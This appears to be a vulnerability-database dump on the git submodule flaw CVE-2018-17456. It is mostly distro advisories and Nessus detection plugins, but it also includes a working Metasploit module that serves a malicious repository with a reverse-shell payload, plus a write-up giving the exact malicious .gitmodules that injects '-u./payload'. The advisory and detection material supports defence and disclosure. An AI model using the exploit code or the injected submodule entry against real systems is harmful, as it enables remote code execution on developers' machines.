\"perl-Git-1.8.3.1-20.h1\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"3\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T01:10:33", "description": "New git packages are available for Slackware 14.0, 14.1, 14.2, and\n-current to fix a security 
issue.", "edition": 20, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-10-11T00:00:00", "title": "Slackware 14.0 / 14.1 / 14.2 / current : git (SSA:2018-283-01)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17456"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:14.2", "cpe:/o:slackware:slackware_linux:14.1", "p-cpe:/a:slackware:slackware_linux:git", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux"], "id": "SLACKWARE_SSA_2018-283-01.NASL", "href": "https://www.tenable.com/plugins/nessus/118059", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2018-283-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118059);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/04/05 23:25:07\");\n\n script_cve_id(\"CVE-2018-17456\");\n script_xref(name:\"SSA\", value:\"2018-283-01\");\n\n script_name(english:\"Slackware 14.0 / 14.1 / 14.2 / current : git (SSA:2018-283-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New git packages are available for Slackware 14.0, 14.1, 14.2, and\n-current to fix a security issue.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2018&m=slackware-security.442862\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b4819b2c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected git package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n 
script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git HTTP Server For CVE-2018-17456');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"14.0\", pkgname:\"git\", pkgver:\"2.14.5\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"git\", pkgver:\"2.14.5\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"git\", pkgver:\"2.14.5\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"git\", pkgver:\"2.14.5\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"14.2\", pkgname:\"git\", pkgver:\"2.14.5\", pkgarch:\"i586\", pkgnum:\"1_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"git\", pkgver:\"2.14.5\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"git\", pkgver:\"2.19.1\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"git\", pkgver:\"2.19.1\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else 
security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "centos": [{"lastseen": "2020-12-08T03:38:29", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17456"], "description": "**CentOS Errata and Security Advisory** CESA-2018:3408\n\n\nGit is a distributed revision control system with a decentralized architecture. As opposed to centralized version control systems with a client-server model, Git ensures that each working copy of a Git repository is an exact copy with complete revision history. This not only allows the user to work on and contribute to projects without the need to have permission to push the changes to their official repositories, but also makes it possible for the user to work with no network connection.\n\nSecurity Fix(es):\n\n* git: arbitrary code execution via .gitmodules (CVE-2018-17456)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2018-December/035140.html\nhttp://lists.centos.org/pipermail/centos-cr-announce/2018-November/005748.html\n\n**Affected packages:**\nemacs-git\nemacs-git-el\ngit\ngit-all\ngit-bzr\ngit-cvs\ngit-daemon\ngit-email\ngit-gnome-keyring\ngit-gui\ngit-hg\ngit-instaweb\ngit-p4\ngit-svn\ngitk\ngitweb\nperl-Git\nperl-Git-SVN\n\n**Upstream details at:**\n", "edition": 86, "modified": "2018-12-13T20:45:19", "published": "2018-11-20T23:41:54", "id": "CESA-2018:3408", "href": "http://lists.centos.org/pipermail/centos-cr-announce/2018-November/005748.html", "title": "emacs, git, gitk, gitweb, perl security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2018-10-09T02:17:03", "description": "", "published": "2018-10-08T00:00:00", "type": 
"packetstorm", "title": "Git Submodule Arbitrary Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-17456"], "modified": "2018-10-08T00:00:00", "id": "PACKETSTORM:149709", "href": "https://packetstormsecurity.com/files/149709/Git-Submodule-Arbitrary-Code-Execution.html", "sourceData": "`These releases fix a security flaw (CVE-2018-17456), which allowed an \nattacker to execute arbitrary code by crafting a malicious .gitmodules \nfile in a project cloned with --recurse-submodules. \n \nWhen running \"git clone --recurse-submodules\", Git parses the supplied \n.gitmodules file for a URL field and blindly passes it as an argument \nto a \"git clone\" subprocess. If the URL field is set to a string that \nbegins with a dash, this \"git clone\" subprocess interprets the URL as \nan option. This can lead to executing an arbitrary script shipped in \nthe superproject as the user who ran \"git clone\". \n \nIn addition to fixing the security issue for the user running \"clone\", \nthe 2.17.2, 2.18.1 and 2.19.1 releases have an \"fsck\" check which can \nbe used to detect such malicious repository content when fetching or \naccepting a push. See \"transfer.fsckObjects\" in git-config(1). \n \nCredit for finding and fixing this vulnerability goes to joernchen \nand Jeff King, respectively. \n \nP.S. Folks at Microsoft tried to follow the known exploit recipe on \nGit for Windows (but not Cygwin or other Git implementations on \nWindows) and found that the recipe (or its variants they can think \nof) would not make their system vulnerable. This is due to the fact \nthat the type of submodule path require by the known exploit recipe \ncannot be created on Windows. Nonetheless, it is possible we have \nmissed some exploitation path and users are encouraged to upgrade. 
\n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/149709/gitmodule-exec.txt"}, {"lastseen": "2018-11-16T02:15:59", "description": "", "published": "2018-11-15T00:00:00", "type": "packetstorm", "title": "Malicious Git HTTP Server", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-17456"], "modified": "2018-11-15T00:00:00", "id": "PACKETSTORM:150380", "href": "https://packetstormsecurity.com/files/150380/Malicious-Git-HTTP-Server.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpServer \ninclude Msf::Exploit::Git \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Malicious Git HTTP Server For CVE-2018-17456', \n'Description' => %q( \nThis module exploits CVE-2018-17456, which affects Git \nversions 2.14.5, 2.15.3, 2.16.5, 2.17.2, 2.18.1, and 2.19.1 and lower. \n \nWhen a submodule url which starts with a dash e.g \"-u./payload\" is passed \nas an argument to git clone, the file \"payload\" inside the repository \nis executed. \n \nThis module creates a fake git repository which contains a submodule \ncontaining the vulnerability. 
The vulnerability is triggered when the \nsubmodules are initialised (e.g git clone --recurse-submodules URL) \n), \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2018-17456'], \n['URL', 'https://marc.info/?l=git&m=153875888916397&w=2' ], \n['URL', 'https://gist.github.com/joernchen/38dd6400199a542bc9660ea563dcf2b6' ], \n['URL', 'https://blog.github.com/2018-10-05-git-submodule-vulnerability' ], \n], \n'DisclosureDate' => 'Oct 05 2018', \n'Targets' => [ \n['Automatic', \n{ \n'Platform' => [ 'unix' ], \n'Arch' => ARCH_CMD, \n'Payload' => {'Compat' => {'PayloadType' => 'python'}} \n} \n] \n], \n'DefaultOptions' => {'Payload' => 'cmd/unix/reverse_python'}, \n'DefaultTarget' => 0 \n) \n) \n \nregister_options( \n[ \nOptString.new('GIT_URI', [false, 'The URI to use as the malicious Git instance (empty for random)', '']), \nOptString.new('GIT_SUBMODULE', [false, 'The path to use as the malicious git submodule (empty for random)', '']) \n] \n) \nend \n \ndef setup \n@repo_data = { \ngit: { files: {} } \n} \nsetup_git \nsuper \nend \n \ndef setup_git \n# URI must start with a / \nunless git_uri && git_uri.start_with?('/') \nfail_with(Failure::BadConfig, 'GIT_URI must start with a /') \nend \n \npayload_content = \"#!/bin/sh\\n#{payload.raw} &\" \npayload_file = Rex::Text.rand_text_alpha(4..6) \n \nsubmodule_path = datastore['GIT_SUBMODULE'] \nif submodule_path.blank? 
\nsubmodule_path = Rex::Text.rand_text_alpha(2..6).downcase + \":\" + Rex::Text.rand_text_alpha(2..6).downcase \nend \nunless submodule_path.include?\":\" \nfail_with(Failure::BadConfig, 'GIT_SUBMODULE must contain a :') \nend \n \ngitmodules = \"[submodule \\\"#{submodule_path}\\\"] \npath = #{submodule_path} \nurl = -u./#{payload_file} \n\" \n \nsha1, content = build_object('blob', gitmodules) \n@repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content \npayloadsha1, content = build_object('blob', payload_content) \n@repo_data[:git][:files][\"/objects/#{get_path(payloadsha1)}\"] = content \n \ntree = \"100644 .gitmodules\\0#{[sha1].pack('H*')}\" \ntree += \"100744 #{payload_file}\\0#{[payloadsha1].pack('H*')}\" \ntree += \"160000 #{submodule_path}\\0#{[sha1].pack('H*')}\" \nsha1, content = build_object('tree', tree) \n@repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content \n \nsha1, content = build_object('commit', \"tree #{sha1}\\n#{fake_commit_message}\") \n@repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content \n@repo_data[:git][:files]['/HEAD'] = \"ref: refs/heads/master\\n\" \n@repo_data[:git][:files]['/info/refs'] = \"#{sha1}\\trefs/heads/master\\n\" \nend \n \ndef primer \n# add the git and mercurial URIs as necessary \nhardcoded_uripath(git_uri) \ngit_url = URI.parse(get_uri).merge(git_uri) \nprint_status(\"Malicious Git URI is #{git_url}\") \nprint_status(\"git clone --recurse-submodules #{git_url}\") \nend \n \n# handles git clone \ndef on_request_uri(cli, req) \nreq_file = URI.parse(req.uri).path.gsub(/^#{git_uri}/, '') \nif @repo_data[:git][:files].key?(req_file) \nvprint_status(\"Sending Git #{req_file}\") \nsend_response(cli, @repo_data[:git][:files][req_file]) \nelse \nvprint_status(\"Git #{req_file} doesn't exist\") \nsend_not_found(cli) \nend \nend \n \n# Returns the value of GIT_URI if not blank, otherwise returns a random .git URI \ndef git_uri \nreturn @git_uri if @git_uri \nif datastore['GIT_URI'].blank? 
\n@git_uri = '/' + Rex::Text.rand_text_alpha(4..6).downcase + '.git' \nelse \n@git_uri = datastore['GIT_URI'] \nend \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/150380/git_submodule_url_exec.rb.txt"}, {"lastseen": "2018-10-17T18:18:51", "description": "", "published": "2018-10-17T00:00:00", "type": "packetstorm", "title": "Git Submodule Arbitrary Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-11235", "CVE-2018-17456"], "modified": "2018-10-17T00:00:00", "id": "PACKETSTORM:149836", "href": "https://packetstormsecurity.com/files/149836/Git-Submodule-Arbitrary-Code-Execution.html", "sourceData": "`# CVE-2018-17456 \n \nI've gotten a couple of questions about exploitation for the \n[recent RCE](https://marc.info/?l=git&m=153875888916397&w=2) in Git. So here we \ngo with some technical details. \n \n## TL;DR \n \n[Here](https://github.com/joernchen/poc-submodule) is a PoC repository. \nEDB Note: Mirror ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45631.zip \n \n## Exploitation \n \nThe `.gitmodules` file looks as follows: \n \n``` \n[submodule \"x:x\"] \npath = x:x \nurl = -u./payload \n``` \n \nThe actual command being injected is set by the url, `-u./payload` \npoints the `upload-pack` flag of git clone to the `payload` shell \nscript. Note also the `:` within the path, this part is needed to \nactually get the `payload` script executed. \n \nThe path will end up as the repository URL in the subsequent `clone` \noperation: \n \n``` \nexecve(\"/usr/lib/git-core/git\", [\"/usr/lib/git-core/git\", \"clone\", \n\"--no-checkout\", \"--progress\", \"--separate-git-dir\", \n\"/tmp/huhu/.git/modules/x:x\", \"-u./payload\", \"/tmp/huhu/x:x\"],... \n``` \n \nAs the actual URL from `.gitmodules` is interpreted as the `-u` \nargument. 
\n \nThe colon is due to the fact that the colon character lets us go past \nthose lines in `transport.c`: \n \n```c \n} else if (url_is_local_not_ssh(url) && is_file(url) && is_bundle(url, 1)) { \nstruct bundle_transport_data *data = xcalloc(1, sizeof(*data)); \ntransport_check_allowed(\"file\"); \nret->data = data; \nret->vtable = &bundle_vtable; \nret->smart_options = NULL; \n``` \n \n`url_is_local_not_ssh` will return false due to the colon \nin the path, and therefore later on in the code the smart_options \ncontaining the `uploadpack` setting are still in place: \n \n```c \n} else { \n/* Unknown protocol in URL. Pass to external handler. */ \nint len = external_specification_len(url); \nchar *handler = xmemdupz(url, len); \ntransport_helper_init(ret, handler); \n} \n \nif (ret->smart_options) { \nret->smart_options->thin = 1; \nret->smart_options->uploadpack = \"git-upload-pack\"; \nif (remote->uploadpack) \nret->smart_options->uploadpack = remote->uploadpack; \nret->smart_options->receivepack = \"git-receive-pack\"; \nif (remote->receivepack) \nret->smart_options->receivepack = remote->receivepack; \n} \n``` \n \n## Further hints \n \nThe constraint to have a colon in the `path` seems to hinder exploitation on Windows \nas a colon is a forbidden character within a path on Windows. However as noted by \nsome people during the disclosure: Git running within the Windows Subsystem for Linux or \ncygwin will allow exploitation on Windows hosts. \n \nEtienne Stalmans who found [a similar issue](https://staaldraad.github.io/post/2018-06-03-cve-2018-11235-git-rce/) \nearlier this year managed to exploit this argument injection [using `--template`](https://twitter.com/_staaldraad/status/1049241254939246592). 
\n \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/149836/gitsubmod-exec.txt"}], "debian": [{"lastseen": "2020-09-22T12:57:22", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17456"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4311-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nOctober 05, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : git\nCVE ID : CVE-2018-17456\n\njoernchen of Phenoelit discovered that git, a fast, scalable,\ndistributed revision control system, is prone to an arbitrary code\nexecution vulnerability via a specially crafted .gitmodules file in a\nproject cloned with --recurse-submodules.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 1:2.11.0-3+deb9u4.\n\nWe recommend that you upgrade your git packages.\n\nFor the detailed security status of git please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/git\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 11, "modified": "2018-10-05T19:29:54", "published": "2018-10-05T19:29:54", "id": "DEBIAN:DSA-4311-1:A583A", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2018/msg00242.html", "title": "[SECURITY] [DSA 4311-1] git security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:31:50", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17456"], "description": "\nThe Git community reports:\n\nMultiple 
vulnerabilities.\n\n", "edition": 3, "modified": "2018-10-05T00:00:00", "published": "2018-10-05T00:00:00", "id": "8C08AB4C-D06C-11E8-B35C-001B217B3468", "href": "https://vuxml.freebsd.org/freebsd/8c08ab4c-d06c-11e8-b35c-001b217b3468.html", "title": "Libgit2 -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:38:07", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17456"], "description": "[1.8.3.1-20]\n- Fix CVE-2018-17456: arbitrary code execution via .gitmodules\n Thanks to Jonathan Nieder \n for backporting to 2.1.x\n and to Steve Beattie \n for backporting to 1.9.1", "edition": 4, "modified": "2018-11-09T00:00:00", "published": "2018-11-09T00:00:00", "id": "ELSA-2018-3408", "href": "http://linux.oracle.com/errata/ELSA-2018-3408.html", "title": "git security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-04T00:32:58", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17456"], "description": "[1.7.1-10]\n- fixes arbitrary code execution via .gitmodules\n Resolves: CVE-2018-17456", "edition": 1, "modified": "2020-02-03T00:00:00", "published": "2020-02-03T00:00:00", "id": "ELSA-2020-0316", "href": "http://linux.oracle.com/errata/ELSA-2020-0316.html", "title": "git security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "amazon": [{"lastseen": "2020-11-10T12:37:26", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17456"], "description": "**Issue Overview:**\n\nGit before 2.14.5, allows remote code execution during processing of a recursive \"git clone\" of a superproject if a .gitmodules file has a URL field beginning with a '-' character.([CVE-2018-17456 __](<https://access.redhat.com/security/cve/CVE-2018-17456>))\n\n \n**Affected Packages:** \n\n\ngit\n\n \n**Issue Correction:** \nRun _yum update git_ to update your system. 
\n\n\n \n\n\n**New Packages:**\n \n \n i686: \n git-debuginfo-2.14.5-1.59.amzn1.i686 \n git-svn-2.14.5-1.59.amzn1.i686 \n git-daemon-2.14.5-1.59.amzn1.i686 \n git-2.14.5-1.59.amzn1.i686 \n \n noarch: \n git-p4-2.14.5-1.59.amzn1.noarch \n git-email-2.14.5-1.59.amzn1.noarch \n perl-Git-SVN-2.14.5-1.59.amzn1.noarch \n git-hg-2.14.5-1.59.amzn1.noarch \n emacs-git-2.14.5-1.59.amzn1.noarch \n emacs-git-el-2.14.5-1.59.amzn1.noarch \n git-all-2.14.5-1.59.amzn1.noarch \n perl-Git-2.14.5-1.59.amzn1.noarch \n git-bzr-2.14.5-1.59.amzn1.noarch \n git-cvs-2.14.5-1.59.amzn1.noarch \n gitweb-2.14.5-1.59.amzn1.noarch \n \n src: \n git-2.14.5-1.59.amzn1.src \n \n x86_64: \n git-daemon-2.14.5-1.59.amzn1.x86_64 \n git-svn-2.14.5-1.59.amzn1.x86_64 \n git-2.14.5-1.59.amzn1.x86_64 \n git-debuginfo-2.14.5-1.59.amzn1.x86_64 \n \n \n", "edition": 6, "modified": "2018-10-17T22:02:00", "published": "2018-10-17T22:02:00", "id": "ALAS-2018-1093", "href": "https://alas.aws.amazon.com/ALAS-2018-1093.html", "title": "Important: git", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-10T12:35:33", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17456"], "description": "**Issue Overview:**\n\nGit before 2.14.5, allows remote code execution during processing of a recursive \"git clone\" of a superproject if a .gitmodules file has a URL field beginning with a '-' character.([CVE-2018-17456 __](<https://access.redhat.com/security/cve/CVE-2018-17456>))\n\n \n**Affected Packages:** \n\n\ngit\n\n \n**Issue Correction:** \nRun _yum update git_ to update your system. 
\n\n\n \n\n\n**New Packages:**\n \n \n i686: \n git-2.14.5-1.amzn2.i686 \n git-core-2.14.5-1.amzn2.i686 \n git-core-doc-2.14.5-1.amzn2.i686 \n git-daemon-2.14.5-1.amzn2.i686 \n git-svn-2.14.5-1.amzn2.i686 \n git-gnome-keyring-2.14.5-1.amzn2.i686 \n git-debuginfo-2.14.5-1.amzn2.i686 \n \n noarch: \n git-all-2.14.5-1.amzn2.noarch \n gitweb-2.14.5-1.amzn2.noarch \n git-p4-2.14.5-1.amzn2.noarch \n git-cvs-2.14.5-1.amzn2.noarch \n git-email-2.14.5-1.amzn2.noarch \n git-gui-2.14.5-1.amzn2.noarch \n gitk-2.14.5-1.amzn2.noarch \n perl-Git-2.14.5-1.amzn2.noarch \n perl-Git-SVN-2.14.5-1.amzn2.noarch \n \n src: \n git-2.14.5-1.amzn2.src \n \n x86_64: \n git-2.14.5-1.amzn2.x86_64 \n git-core-2.14.5-1.amzn2.x86_64 \n git-core-doc-2.14.5-1.amzn2.x86_64 \n git-daemon-2.14.5-1.amzn2.x86_64 \n git-svn-2.14.5-1.amzn2.x86_64 \n git-gnome-keyring-2.14.5-1.amzn2.x86_64 \n git-debuginfo-2.14.5-1.amzn2.x86_64 \n \n \n", "edition": 1, "modified": "2018-10-24T16:31:00", "published": "2018-10-24T16:31:00", "id": "ALAS2-2018-1093", "href": "https://alas.aws.amazon.com/AL2/ALAS-2018-1093.html", "title": "Important: git", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2018-10-12T14:30:05", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17456"], "description": "This update for git fixes the following issues:\n\n - CVE-2018-17456: Git allowed remote code execution during processing of a\n recursive "git clone" of a superproject if a .gitmodules file has a URL\n field beginning with a '-' character. 
(boo#1110949).\n\n", "edition": 1, "modified": "2018-10-12T12:11:54", "published": "2018-10-12T12:11:54", "id": "OPENSUSE-SU-2018:3109-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-10/msg00028.html", "title": "Security update for git (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-12-08T17:30:05", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17456"], "description": "This update for libgit2 fixes the following issues:\n\n\n Security issue fixed:\n\n - CVE-2018-17456: Submodule URLs and paths with a leading "-" are now\n ignored to avoid injecting options into library consumers that perform\n recursive clones (bsc#1110949).\n\n\n Non-security issues fixed:\n\n - Version update to version 0.26.8 (bsc#1114729).\n - Full changelog can be found at:\n * <a rel=\"nofollow\" href=\"https://github.com/libgit2/libgit2/releases/tag/v0.26.8\">https://github.com/libgit2/libgit2/releases/tag/v0.26.8</a>\n * <a rel=\"nofollow\" href=\"https://github.com/libgit2/libgit2/releases/tag/v0.26.7\">https://github.com/libgit2/libgit2/releases/tag/v0.26.7</a>\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n", "edition": 1, "modified": "2018-12-08T15:09:50", "published": "2018-12-08T15:09:50", "id": "OPENSUSE-SU-2018:4051-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-12/msg00019.html", "title": "Security update for libgit2 (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-17T08:31:02", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17456"], "description": "This update for git fixes the following issues:\n\n - CVE-2018-17456: Git allowed remote code execution during processing of a\n recursive "git clone" of a superproject if a .gitmodules file has a URL\n field beginning with a '-' character. 
(boo#1110949).\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n", "edition": 1, "modified": "2018-10-17T06:09:56", "published": "2018-10-17T06:09:56", "id": "OPENSUSE-SU-2018:3178-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-10/msg00030.html", "title": "Security update for git (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-10-09T02:49:06", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2018-10-09T00:00:00", "title": "Git Submodule - Arbitrary Code Execution Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-17456"], "modified": "2018-10-09T00:00:00", "id": "1337DAY-ID-31270", "href": "https://0day.today/exploit/description/31270", "sourceData": "These releases fix a security flaw (CVE-2018-17456), which allowed an\r\nattacker to execute arbitrary code by crafting a malicious .gitmodules\r\nfile in a project cloned with --recurse-submodules.\r\n \r\nWhen running \"git clone --recurse-submodules\", Git parses the supplied\r\n.gitmodules file for a URL field and blindly passes it as an argument\r\nto a \"git clone\" subprocess. If the URL field is set to a string that\r\nbegins with a dash, this \"git clone\" subprocess interprets the URL as\r\nan option. This can lead to executing an arbitrary script shipped in\r\nthe superproject as the user who ran \"git clone\".\r\n \r\nIn addition to fixing the security issue for the user running \"clone\",\r\nthe 2.17.2, 2.18.1 and 2.19.1 releases have an \"fsck\" check which can\r\nbe used to detect such malicious repository content when fetching or\r\naccepting a push. See \"transfer.fsckObjects\" in git-config(1).\r\n \r\nCredit for finding and fixing this vulnerability goes to joernchen\r\nand Jeff King, respectively.\r\n \r\nP.S. 
Folks at Microsoft tried to follow the known exploit recipe on\r\nGit for Windows (but not Cygwin or other Git implementations on\r\nWindows) and found that the recipe (or its variants they can think\r\nof) would not make their system vulnerable. This is due to the fact\r\nthat the type of submodule path required by the known exploit recipe\r\ncannot be created on Windows. Nonetheless, it is possible we have\r\nmissed some exploitation path and users are encouraged to upgrade.\n\n# 0day.today [2018-10-09] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31270"}], "slackware": [{"lastseen": "2020-10-25T16:36:04", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17456"], "description": "New git packages are available for Slackware 14.0, 14.1, 14.2, and -current to\nfix a security issue.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/git-2.14.5-i586-1_slack14.2.txz: Upgraded.\n This update fixes a security issue:\n Submodules' \"URL\"s come from the untrusted .gitmodules file, but we\n blindly gave it to \"git clone\" to clone submodules when \"git clone\n --recurse-submodules\" was used to clone a project that has such a\n submodule. The code has been hardened to reject such malformed URLs\n (e.g. one that begins with a dash). Credit for finding and fixing this\n 